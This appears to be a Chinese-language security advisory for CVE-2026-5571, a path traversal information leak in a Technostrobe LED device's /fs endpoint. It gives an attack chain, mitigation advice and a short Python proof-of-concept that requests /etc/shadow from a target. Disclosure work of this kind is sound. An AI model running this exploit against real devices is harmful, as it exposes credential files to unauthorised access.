IPBUF安全漏洞报告
English
CVE-2026-5571 CVSS 5.3 中危

CVE-2026-5571 Technostrobe设备信息泄露漏洞

披露日期: 2026-04-05

漏洞信息

漏洞编号
CVE-2026-5571
漏洞类型
信息泄露
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Technostrobe HI-LED-WR120-G2

相关标签

信息泄露TechnostrobeIoTPath Traversal

漏洞概述

Technostrobe HI-LED-WR120-G2 设备的 Configuration Data Handler 组件存在信息泄露漏洞。攻击者无需身份认证,即可通过操纵 /fs 文件接口中的 File 参数,远程获取系统敏感配置数据。

技术细节

该漏洞位于 Technostrobe HI-LED-WR120-G2 设备的 Configuration Data Handler 组件中,具体涉及文件 /fs 的处理逻辑。由于系统未对传入的 File 参数进行严格的过滤和安全校验,攻击者可以通过构造特制的 HTTP 请求,修改该参数值来遍历文件系统或读取敏感文件。攻击向量为网络(AV:N),无需用户交互(UI:N)且无需权限(PR:N)。利用该漏洞可导致低程度的机密性影响(C:L),目前公开的利用代码已存在,厂商尚未对此做出响应。

攻击链分析

STEP 1
侦察
攻击者扫描网络,识别暴露的 Technostrobe HI-LED-WR120-G2 设备。
STEP 2
漏洞利用
攻击者向目标设备的 /fs 接口发送包含恶意 File 参数的 HTTP GET 请求。
STEP 3
数据获取
设备由于未验证参数,返回请求的敏感文件内容(如配置文件)。
STEP 4
后渗透
攻击者分析获取的敏感信息,为进一步入侵做准备。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL of the vulnerable device target_url = "http://<target_ip>/fs" # The vulnerable parameter 'File' can be manipulated to read sensitive files # Example payload to read a common system configuration file params = { "File": "/etc/shadow" } try: response = requests.get(target_url, params=params, timeout=5) if response.status_code == 200: print("[+] Exploit successful! Data received:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

Technostrobe HI-LED-WR120-G2 5.5.0.1R6.03.30

防御指南

临时缓解措施
由于厂商暂未发布补丁,建议通过网络访问控制列表(ACL)限制对设备管理端口(如80/443/8080)的访问,仅允许可信的内网IP地址连接,或通过防火墙阻断外部对 /fs 路径的请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表